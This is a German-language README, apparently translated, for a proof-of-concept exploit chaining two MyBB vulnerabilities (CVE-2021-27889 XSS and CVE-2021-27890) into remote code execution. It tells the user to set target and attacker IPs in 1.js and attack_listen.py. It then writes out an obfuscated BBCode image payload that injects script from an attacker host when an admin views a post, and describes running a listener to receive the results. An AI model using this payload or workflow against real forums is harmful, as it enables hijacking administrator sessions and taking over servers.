
Mybb assoziiert CVE-2021-27890 & CVE-2021-27889 mit RCE-poc.
Mybb verknüpft CVE-2021-27890 & CVE-2021-27889 mit dem RCE-PoC
Vor der Verwendung:
Hier gibt es zwei Dateien: 1.js und attack_listen.py
Sie sollten diese beiden Dateien ändern:
1.js:
Ändern Sie die MyBB-Forum-URL und die Angriffs-URL:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
Ändern Sie den Angriffs-Host und den Angriffs-Port:
attack_host = '192.168.92.165'
attack_port = 8080
Verwendung:
CVE-2021-27889 ist XSS. Sie sollten den folgenden Payload in "New Post Thread" oder "Reply" oder "Private Messages" injizieren, bevor Sie den Angriff durchführen. In dieser Demo sende ich den Payload an "New Post Thread".
Beachten Sie, dass 192.168.92.165 die IP des bösartigen Servers ist. Sie sollten sie ändern.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Nun wurde unser bösartiges JS 1.js erfolgreich injiziert. Dann sollten wir warten, bis ein Admin diesen Beitrag mit dem Cookie der angemeldeten Admin-Seite besucht.
Beachten Sie, dass der Admin-Benutzer nicht zwingend auf der Forumsseite angemeldet sein muss.
Während wir warten, sollten wir das "attack_listen.py" auf unserer Angriffsmaschine ausführen, um festzustellen, ob der Admin-Benutzer angegriffen wird.
python3 attack_listen.py
Wenn der Admin-Benutzer den bösartigen Beitrag aufruft, führt das bösartige JS den Angriff aus:

Wir können die Informationen auf unserer Angriffsmaschine empfangen:

